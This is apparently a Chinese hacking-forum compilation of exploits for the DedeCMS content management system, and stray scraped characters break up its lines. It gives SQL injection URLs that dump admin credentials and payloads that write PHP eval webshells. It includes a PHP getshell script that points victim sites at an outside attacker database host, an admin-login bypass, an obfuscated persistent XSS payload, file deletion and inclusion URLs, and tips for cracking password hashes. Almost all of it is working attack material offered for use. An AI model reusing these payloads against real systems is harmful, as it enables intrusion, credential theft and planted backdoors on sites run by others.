|
|
4 ?: q9 E' D. K& i/ c3 N! e& Q
Dedecms 5.6 rss注入漏洞
$ V4 L* l8 F$ t0 m+ nhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
g% j& B7 O6 }- @% r- u2 [$ D) g0 n& Z! ?& ?6 g
, W7 J5 e, D8 C* }$ K. ^ c/ y x- i( m" F
! A+ M2 u$ A4 Z& @1 C7 ]- Q8 A9 S8 g
; G$ U( m! E" i' o4 i% d/ Q2 W' n1 j1 {: _$ o& N Y
`0 N+ n/ o# T1 K, hDedeCms v5.6 嵌入恶意代码执行漏洞' q5 L4 [4 d! \! j v; ~( _( ~7 K
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}& a$ E" K* g V" ^) H
发表后查看或修改即可执行 `( e" |5 \9 @* p8 M$ s
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
( I2 l9 @! q1 M生成x.php 密码xiao,直接生成一句话。
5 O( ]( {1 F, t
, x% z |. I4 {- P: B6 i! S; A, C* Z! w( ?+ M1 |, u, f
: K: v; A( L3 P. {: @1 [( z2 ?) f+ q6 C# ^1 T C4 R
7 P" `; S8 q) B; ?8 P
* ]5 M0 G4 O9 ]% p
0 C" h5 W/ }2 z0 y" K/ s! g9 k; r* u2 A6 X
Dede 5.6 GBK SQL注入漏洞
& I7 ?* o( x- N$ _" I0 E& [% qhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';7 e6 X s. \/ \9 Y: w. L
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
& `" ^( m$ ~! r2 j, {% m, Rhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A74 f) A! v& b# {
9 N3 w0 c5 A3 T5 Q: U
' V% A( l% n# }# M) g
) @7 x, i4 T1 y. H, n
5 |7 }* ]9 d4 v* s6 ^! s" \5 |- b+ o+ e3 X! z" j5 w* O6 O; b, z
; X; ^# L. L4 f2 G# p: f1 \
; [, Q# }1 L7 v$ X: m3 ^: ]
. X: Z8 g3 _1 `DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
# \* J+ z9 V) P1 h6 vhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
1 @& r* z6 I2 h) u( k8 G1 @8 V4 _; T3 H5 ?) ?# ~/ r
9 k6 {1 F" ~( \5 c9 U
7 R4 t, Y! ?# a( h8 c& E) n
, R3 C7 [' t9 G7 X4 L4 [4 N6 K: _/ k0 }/ k* `! ^
" b$ W. U1 P: S& F# g1 G
DEDECMS 全版本 gotopage变量XSS漏洞
# X6 d6 d, N. l1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ) l o" u/ L$ K1 D! }( e. O
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="7 A- x, q. }/ F- I5 n, p: D7 v
' l) y1 i4 z7 d6 X2 P' Y% |
# u4 r3 ]4 Q& m: Q- e2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
) T* S! [( G& Fhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
: }1 i( Q& h% y
6 B- G* n3 d4 d% B8 v8 r9 o( c9 A% p; r: e7 Y9 c% \% a5 E
http://v57.demo.dedecms.com/dede/login.php0 v) g3 y( q$ k. t/ Q$ c' V
" ]$ J/ T2 E4 O& j. R8 s# v
/ J3 f$ A5 _' \6 q
color=Red]DeDeCMS(织梦)变量覆盖getshell
) O' ~/ x! S9 X \7 ~9 t! z#!usr/bin/php -w$ g6 { A- F" [% w+ ~
<?php3 [; u* C% z K( Z5 Q
error_reporting(E_ERROR);
0 }7 G0 Q- `. p* x Q H7 J' Iset_time_limit(0);
, e7 }* y9 n' H" W$ ~print_r('& _* [0 i$ u: |0 ]
DEDEcms Variable Coverage
2 B% Z/ m/ W6 V" W0 X6 b9 k$ bExploit Author: www.heixiaozi.comwww.webvul.com
* u; S1 q1 E+ q2 z);
9 _3 p1 |* C/ r8 lecho "\r\n";
& V* p, Y1 x3 }# Mif($argv[2]==null){
4 \ ]4 C- \' r2 z8 vprint_r('! K$ w3 u6 N. W' }. @# ~
+---------------------------------------------------------------------------+
3 a% q5 s- h0 h$ N! h. @Usage: php '.$argv[0].' url aid path& I7 |5 t# \7 O# H8 y
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/* z2 A+ I- t4 j7 }+ R3 v0 g
Example:8 _9 W$ N8 e5 e% E
php '.$argv[0].' www.site.com 1 old
; c' v- ~: M& G- Y/ Q& l+---------------------------------------------------------------------------+
- V3 W% e$ O; B4 U5 v5 a');
0 Y; m' A: A& v8 q( S+ Vexit;( T( l7 \6 A/ t) _: H) S4 r8 h
}
9 L$ D+ A) T$ B$ u' j' E6 Z$url=$argv[1];
! e5 q! @) ]5 B' W$aid=$argv[2];4 ]* l7 T' ^, H; z1 I8 g( z$ O% O3 \+ f
$path=$argv[3];' {7 i2 X7 y8 m- s$ G
$exp=Getshell($url,$aid,$path);( n- |) i: E1 v$ u( s/ Z
if (strpos($exp,"OK")>12){
' _; Y' K, O+ K" M& F& Hecho "
; j. H1 s$ H. @8 zExploit Success \n";" z" t2 r0 h% z7 J4 e
if($aid==1)echo "2 W) ?1 Y7 w6 S3 i% J
Shell:".$url."/$path/data/cache/fuck.php\n" ;
3 g' v; r/ F- V) ?; L0 |
3 T8 H, N$ q9 D1 V/ ^: e
5 x# l# B' {% ~6 p9 X$ F9 H; ~if($aid==2)echo "* m1 h9 O5 C7 C" c" P, R5 f- X
Shell:".$url."/$path/fuck.php\n" ;
- R. T) s$ d C. {
5 d) i5 q2 D! b, z4 l/ ?! z# G& w4 C% O4 N
if($aid==3)echo "0 `) o; L; z/ Y5 x! H& X
Shell:".$url."/$path/plus/fuck.php\n";7 y5 ^- q4 `7 x$ y! Z
+ F" o) ?2 H6 M$ D, ]
# U) e' {9 a y- f1 |}else{; N: e' B% J. `6 ?, c1 \. m9 n
echo "' Y8 f& k" m9 u( t6 I, c9 _; K
Exploit Failed \n";
4 X4 Q0 Q# I7 y}. n3 w. {( c4 x2 G; u4 {( |
function Getshell($url,$aid,$path){! u( {9 H& C6 Q. b# U" _- g
$id=$aid;+ H4 @! o6 ]7 S8 I& X
$host=$url;# w4 Z+ @# A- `& L5 n2 \
$port="80";3 K& K* M! p/ T) x! b: ~6 X8 e
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";: t3 W4 @: ?) }
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";" I6 a& \/ p" |, S
$data .= "Host: ".$host."\r\n";# u( D' |3 ?# z: P- J, I( p' b
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";4 x8 L* n' R( \' J& K1 n
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";- p( E0 [" W! T( N; j, S- Q
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";* v3 E. L* U- D6 R
//$data .= "Accept-Encoding: gzip,deflate\r\n";' t0 q8 ?$ ~2 N
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";1 n- x( }+ S4 L( z4 u. o m* @
$data .= "Connection: keep-alive\r\n";
1 U: Z4 L( Y/ D2 g$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
& x; X1 L. q4 M% N) i' V$data .= "Content-Length: ".strlen($content)."\r\n\r\n";( V. n9 U6 ~$ h- c& s
$data .= $content."\r\n";" ~ ~5 U" _7 [
$ock=fsockopen($host,$port);: c6 W( `7 V& u" Y; v, N
if (!$ock) {
' k. D* \/ n4 N4 m8 decho "
6 }) \3 b2 W0 k0 d7 {0 X9 ENo response from ".$host."\n";7 K* F- ?$ }: H0 w! J9 X) I
}/ @! T; ?7 E) k5 j% H0 u
fwrite($ock,$data);
, n8 @1 ?! T7 f0 p4 K) Cwhile (!feof($ock)) {# E: [6 J$ I/ f" _
$exp=fgets($ock, 1024);
4 l& c' ?4 Y+ T" |. ~; ?return $exp;* T. i+ J$ t( M7 y/ ~
}
' d, c3 M0 X0 [' ~" U- U& ]- v}+ \" C" _! t" I4 u# H) I5 E; M1 O1 F
! _6 Z' V# }, Y9 Y% q4 z
" G) X1 ]& @0 c& a?>
) P( Z: c* X. y
; K- |6 Y+ }: Y$ d
0 ?- s% ~1 n+ K4 F J0 B6 p$ ^$ c. j! r! B# a7 [
@: S' q! K& {6 w. ]
$ z, v1 t& J6 Q, b7 ?) P, m
+ j2 q! S; @7 `. z' x3 ]) z; N4 l
* m& y. P' g% i! `' ~4 h% n
7 K- U! V5 f: p# S) R' Q; `! m4 s( V6 P5 s' m5 Y
7 z, t. M: d4 Y9 L, q* u
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
2 \/ g. k! E I; a5 whttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root6 \# u$ W0 C( d8 V0 B' S) `9 l" E/ z
( d G' K2 \/ F4 H1 S8 ~, x
- k9 S5 ~% l4 R" o4 y1 [) {把上面validate=dcug改为当前的验证码,即可直接进入网站后台( B- C# @/ G8 Y9 n; @1 r3 D
5 y6 w" F. C* d- y- @( `
6 I) K# V# _. ^+ u此漏洞的前提是必须得到后台路径才能实现# n4 z9 T2 s& d& h
3 K- o5 T, m. }+ [
4 W- b# J! _% v) v# c7 }8 ~* B6 q3 u
* x, l! b L$ ~' ~) q* t3 J& J& A
& O. M8 y, n$ m5 B( C
5 ~/ Z% C8 |4 A" S& p0 T% x1 _1 C2 p: [" _* @, ?3 r
7 E8 T3 X' Y/ \4 ~: Q/ ?- Y( `9 }- L1 `
$ F/ N+ U' H9 z- y0 Q5 ODedecms织梦 标签远程文件写入漏洞
7 o- r& }6 t& ]前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
) d3 m- w& r- a7 t% U( c$ ?$ t; u5 D! t% ~' I- u: g
; \; ]- A, ]0 \+ J再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
) q) T- u! ^) C<form action="" method="post" name="QuickSearch" id="QuickSearch">* f! y$ F" t e a" ]/ K6 K
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />; M3 [1 d; Q$ F1 T* {
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />& c' r% ^) w1 v" H S& |* r/ q
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />7 J& g5 V: b7 q9 L( M: U
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
: d0 t. \1 d- j* i9 V2 B: L<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />5 ]$ h% X& X" `
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br /> Q9 G; ~. O1 J' H5 S& D
<input type="text" value="true" name="nocache" style="width:400">
{) j4 o4 O4 | L, v% ^<input type="submit" value="提交" name="QuickSearchBtn"><br />4 [' | k% {# k: G
</form>; T3 O( ?1 B2 m8 a, a
<script>2 W& c0 Y7 ~5 L3 j0 D) u
function addaction()4 B3 c. U( F8 H& j/ r& }
{+ V' I1 t6 s( F; e% J$ s. I
document.QuickSearch.action=document.QuickSearch.doaction.value;3 {( s5 J: m/ L! P. P0 e1 v( d3 O8 L
}
9 R/ Z/ k/ U( W: O+ e; b</script>4 }$ l& o" i" N# V4 \- F
4 V: [+ ]9 R' v$ f# v" X# [+ N2 O# Q u, v! o0 h' r4 s& {3 E5 @: y
/ B. T' {6 g1 B$ z, \) I
: ^/ D8 B7 [2 F( E" r7 j0 n8 Y7 m( i3 J0 p- r: [" W( w$ F& u
5 }. B) {5 R D. p" y
2 f' H( i& `6 Q* J- n8 _' y( d( e' H) V9 `
) V! z$ y8 H) {4 i! u8 `- c
: `3 |+ O: p. C" J; r( j2 i6 U$ T4 m# wDedeCms v5.6 嵌入恶意代码执行漏洞" Z" d- A. N; r- h7 {2 G% \
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
- x" B( n$ g" f8 F* w" ta{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}1 O: b/ f# ~- G4 Y& l( f \5 x. n+ V
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得9 B) I, g7 O) L1 C; x
Dedecms <= V5.6 Final模板执行漏洞8 K" X1 Z9 ^$ w' L
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
0 |$ n5 h. N# x- a8 P& X! m- i2 puploads/userup/2/12OMX04-15A.jpg
7 Q6 I/ h7 F2 n& h1 e2 H- y" K- Q( r: G* H; a7 K
, { K9 b( t% J
模板内容是(如果限制图片格式,加gif89a):. k: K |1 u$ {6 a: W; q
{dede:name runphp='yes'}
# p; \' C5 @: Z8 h, E% G* e$fp = @fopen("1.php", 'a');5 g1 G+ `) k. g+ Z# p
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
/ [9 f8 p. m. ~' K@fclose($fp);
1 y7 P1 O, ]# b) b- Z8 A{/dede:name}! p7 l( Q- F- c+ K2 Q* q9 T! L
2 修改刚刚发表的文章,查看源文件,构造一个表单:( A1 Q, X, C% t
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
: T5 O. N3 H3 W& H<input type="hidden" name="dopost" value="save" />
" u1 R6 j3 W5 A3 u<input type="hidden" name="aid" value="2" />9 l6 Y3 w' C/ h h6 \
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" /> h) `' B H1 Z3 G$ C
<input type="hidden" name="channelid" value="1" />) R' q9 k) ]+ e! }8 Q
<input type="hidden" name="oldlitpic" value="" />+ _- f1 n5 m5 k0 Q4 ]/ C' b/ m
<input type="hidden" name="sortrank" value="1275972263" />/ w4 Y" m9 ~: j% F4 R
; _' `8 I( u) J8 U0 I5 h3 S2 V! s6 W4 _% c
<div id="mainCp">0 K. k5 L$ d, e+ [- C% V
<h3 class="meTitle"><strong>修改文章</strong></h3>
( w# a, ~! W A( N& I/ D0 E
7 o: D. m' I( |4 i. G2 R; M; M( O7 F4 s" a2 y" ~
<div class="postForm">2 f( G# D5 G- V3 A! }
<label>标题:</label>& G7 G. \( q; O8 B5 \
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>" n- J0 H3 v4 K3 k! S: o
* ~$ s" k8 u- a: X5 _
0 [3 d3 ?. o$ q5 j) o: Y
<label>标签TAG:</label>8 d" W h5 j8 ]" D% @* m0 u- t* [: Z$ p- m
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
7 k! q& R( ? ]0 g
G$ |( k% q. t) K2 Q& A( W0 w0 f. F) m
<label>作者:</label>2 V. ?4 Y _5 Q
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
& g1 l4 ~9 X; A- g8 e
# I1 Z$ Q6 J9 o" s2 ]% e7 p+ G7 ~: j2 |. O( g% k5 k- P
<label>隶属栏目:</label>
! t0 x4 e* g) ^8 {5 L/ _<select name='typeid' size='1'>
5 F0 D. m' A; q# l* s: L+ M<option value='1' class='option3' selected=''>测试栏目</option>
7 n6 W' y! ^' T8 p# |! H3 D</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
1 c# R$ h& l! r% j6 T
: i" V/ _+ o4 m4 n7 _8 i" i$ g# p" \4 t4 y/ q6 s
<label>我的分类:</label>2 M. C) c& j! j' N1 _& T' o a
<select name='mtypesid' size='1'>7 \6 q# |. D v [
<option value='0' selected>请选择分类...</option>
" @3 u2 n4 @' t3 V s# r7 g' g% s<option value='1' class='option3' selected>hahahha</option>- o' Y: K# W. }$ D4 r* R9 ]
</select>
: ?0 U3 M! n# A6 a- C* V
( t2 S3 S+ t. i/ m
- E" e: l: s3 {- ? E$ }/ R<label>信息摘要:</label>% J9 r/ @8 v6 q$ p3 I5 p: u9 Y i/ Q5 Q2 G
<textarea name="description" id="description">1111111</textarea>
" ?; _* \- B4 f6 |% B(内容的简要说明)4 i3 J1 K( i& E7 v
. l5 s" K7 Y2 s4 K6 k4 B% K, Y
# V3 u D; U9 u$ y) g- i" @, r<label>缩略图:</label>
9 L0 e9 V4 ]/ n) `% m<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>6 b5 M: g% D4 f
( o" m) T* l( C, u# w
/ Y9 b0 p3 ?) Q5 A. R<input type='text' name='templet'2 O' B# A; b1 {0 F% Z6 x: y9 _
value="../ uploads/userup/2/12OMX04-15A.jpg">
" a/ M; O" j3 G9 g0 L% R# x<input type='text' name='dede_addonfields'
8 b2 v t2 b: c: X: F1 `$ bvalue="templet,htmltext;">(这里构造)2 x. D0 t+ R+ F2 W
</div>" [) M9 |. T8 p' c4 _0 s& l
9 q& M7 _2 I& D Y; z6 w+ @' |9 S! Z6 q* c/ Q! D
<!-- 表单操作区域 -->! |0 B2 H& I, u
<h3 class="meTitle">详细内容</h3>
4 { D* C Y3 c1 Q% f, v. ?0 \0 q |! O$ L
4 @7 K& u5 {8 M2 D
<div class="contentShow postForm">
. Y# V3 [1 U, b0 t% r<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe># N! n* y1 g' F. n% k
+ x4 w, B: N; F: t2 Z
& ~9 w' |& F. x5 c
<label>验证码:</label>2 u: Q6 J- H/ J% M$ _& ~. ~
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />. ], ]2 p3 c- A6 A0 ?
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
/ k# |5 h5 U2 h8 b g7 ]4 F% g
/ ]( s* K$ [* j* @) {
/ Y; w- c) u* _" T0 ?9 {<button class="button2" type="submit">提交</button>* O* e* Y) W/ ~
<button class="button2 ml10" type="reset">重置</button>/ e) M# Z2 W( Z- K
</div>
9 I( g# j3 U6 P v# v/ Q& o8 i1 }/ E, e
% I; L' P! z, u F `/ ], a</div>
) y! X) h3 c% [" k: d {" V1 s# L& f3 R6 f$ M6 c' Q
- i4 J9 _- E5 k' r4 a</form>
! I* s1 }6 ~6 z$ q- k! x, o4 U, i1 j9 b1 l; A# D5 r
. K" Q' w& ^5 V% ]& }' ]) v" L, B
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:1 g2 j8 K W1 J
假设刚刚修改的文章的aid为2,则我们只需要访问:
6 m E/ X/ W! }. J, Ehttp://127.0.0.1/dede/plus/view.php?aid=2
' M/ r& g0 |$ d$ p0 E即可以在plus目录下生成webshell:1.php6 i5 ?/ y7 g6 X' B7 v! I
' f5 Y6 ~( U( r. ?, N( w+ w
0 T! j' e& h% `' T: f. Y3 Z; n( x1 B. p
$ ?) V% L) z/ k4 ?* ?
4 P' a9 x" u& R/ W* r6 G8 u- N/ p/ F5 y. K. Z9 F+ s
9 f" j1 p: x: ]
( W$ D5 Q* Q# R5 X f
g* y- I7 W/ R* j
# P$ b! O" e' _7 \0 y8 _- b" ^/ R; k% a8 B& m0 N+ P0 j+ B
- X' x# m. @6 H$ x2 w2 @/ r6 zDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
+ ?8 g$ M* h) g' h% ?: n: i% J6 AGif89a{dede:field name='toby57' runphp='yes'}
4 W c% G4 m: T2 _0 ~: i' n0 }phpinfo();/ j0 K1 R6 B$ y* Z8 y
{/dede:field}
O4 u1 |8 _4 K保存为1.gif" v0 B" W' `3 a5 z1 `) o8 W! h
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 4 D Y8 L7 W/ n; S# R { e
<input type="hidden" name="aid" value="7" /> & D0 h+ a) t. _' b; H. A8 Z1 Q
<input type="hidden" name="mediatype" value="1" />
5 `; A/ O5 P. t/ N' X" e, s1 {<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
/ b, q5 L" q. p+ u9 `8 g" A: p<input type="hidden" name="dopost" value="save" /> . ~' L3 b5 b! l/ b1 i8 w! T
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> " ]# _' c }% g; W* C
<input name="addonfile" type="file" id="addonfile"/>
* R0 m, u& z6 S5 n# x0 J<button class="button2" type="submit" >更改</button> $ J4 M" O/ x2 j! l
</form>
" g2 X5 q" @) c. M% v
. x9 a# ^% i6 o# J- ^& U) i" O: U7 |- P: k( A/ m* k
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
& `6 Z$ `$ f+ h, K+ J4 p. M, \% c! a发表文章,然后构造修改表单如下:
9 W$ ] N3 o0 {. H j. X: Z, W, a$ x; R+ V* Y4 C
7 e2 T% [- I; [; {0 e6 q9 S0 e<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> - K) r& P: d- _6 U0 b
<input type="hidden" name="dopost" value="save" /> . O$ E/ D5 m" L" g# U8 W1 L. c
<input type="hidden" name="aid" value="2" /> / r) E5 |6 ] I1 A+ Y1 M
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
( }4 i4 b1 G6 \% v/ u6 b0 J1 k# K0 [<input type="hidden" name="channelid" value="1" /> 0 v+ [ |5 P2 }$ ]$ G/ y
<input type="hidden" name="oldlitpic" value="" /> ) L* C* U; Z# ?! \: m
<input type="hidden" name="sortrank" value="1282049150" />
$ u% x z! I; L* m( w1 R<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
8 P4 C; Q" d0 m* x8 d+ a2 u<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 2 `! ]- \1 g5 t; \% k( W! J
<select name='typeid' size='1'>
/ [8 j9 F2 K4 l<option value='1' class='option3' selected=''>Test</option>
* U! E3 R% ^) l4 m5 r* v; o<select name='mtypesid' size='1'>
( b* f8 E0 |4 g<option value='0' selected>请选择分类...</option>
, ^' o' I! p$ I( a) q. Z& C- ^<option value='1' class='option3' selected>aa</option></select>
- Z8 }% h: h$ U6 f<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
* a+ H6 \4 o6 [) p2 J' P( H<input type='hidden' name='dede_addonfields' value="templet"> ! m2 Y( I* b; Q, R5 r
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> , V# V; _( S/ }
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> , E' ]+ ~4 p# I1 u1 R' h+ t* M0 y. ~
<button class="button2" type="submit">提交</button>
/ e! n$ v8 q% @. ~& W2 G9 C# @; U</form>
7 U ]1 }8 n! l" V1 D* A2 X5 t
9 l+ G) v7 v8 m8 c, X0 V! J( Y6 W5 x6 B3 d+ g; j G
' G0 l) f4 ~% f- x
$ O8 x/ q/ ~5 x/ ?2 \1 m* N
% a: s2 z1 F7 ~/ u+ Y( X! R- _0 X0 q
0 O) v7 h; _3 c: b' c' d) N. Q% D
+ h( v) q, E! e5 s0 m! [+ L
( h. L: |) O- ]* Z' s
. n; X8 B% l) C. O) I/ L a1 ?9 ]2 s
6 n- c* J. B$ A; v( W
) P$ t; J6 t2 G织梦(Dedecms)V5.6 远程文件删除漏洞
% v7 S- v; {# y' M+ V3 R- V% @http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif" i2 ^# i( u' J9 X! l
7 X: [1 P! h" y+ \7 m' B3 l: J
5 |0 u0 Y) q3 N3 T+ j
* V$ e" b/ L! y) E( c6 R8 J; a+ B/ E3 M. s" c
# k. ?& }# N. q" y( I+ y; F: q$ L
7 H: m, c- k5 a4 g, Q+ _* z
; o& |; t: [- C
7 |3 I) U- J5 P( |/ D& ~
* l4 X) t( q4 K织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 : ~0 `6 a$ L- f, ?+ A1 }: G C8 G- O" f
http://www.test.com/plus/carbuya ... urn&code=../../2 h- s& O; m6 D! m2 n
8 a: |1 Y3 @- ~# C/ f( G, p7 U) z2 \
/ f4 z2 e& \, ^
+ a5 e- H6 C/ f
: B# j' `- T# g0 J- o( W) p$ P4 J
4 X: ?% E3 P6 w0 {
; U: T% t5 u/ S0 {9 j r
+ ^1 j) }8 m% W$ E
$ ^) `$ ]8 b1 z" y
; Y& K/ R! z+ S7 hDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 # y% G1 e" C' s' T; K
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
2 q* ?2 @: ^3 o* J6 j3 W: _密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5- N/ x; I2 O& ~* |6 k8 y% Q
4 y* M( e! z# ? ^4 p3 G$ H; C2 E, P
. N: `& M$ g9 k" C* t9 {' N
0 L" H5 w4 S' u# @3 _/ ^1 \1 R6 V1 |
# P) x: K) \2 F% `0 h0 M9 I' h- n/ ^
- e$ ?- y) M3 W- \/ ?0 F) f; b; o( P4 t ]' a% X: Q
( L4 i, V9 ?6 Y( n% }0 f
2 L8 j5 t0 E7 Y5 [' m% R
" r" m0 z! f+ ^" i) D- x织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
: m3 ~) @ U1 V+ _+ }3 ?http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
: `9 Y( h. z0 p7 `. R, E. v+ c
3 M0 J% f) m5 y9 m5 d* e$ k7 I( D# s( W( M0 Y4 p+ |3 n
/ _1 h! R; G7 D
Z* ^% ]/ d% v! D
8 o* c* _4 ^( ]+ \& s( i
3 Q7 `6 k2 U9 M% p' K( B9 {
/ I! _" ~: { r. Q x2 r; w& o; j. n* _8 W/ z' a
" n0 K# n- D3 }+ {- J
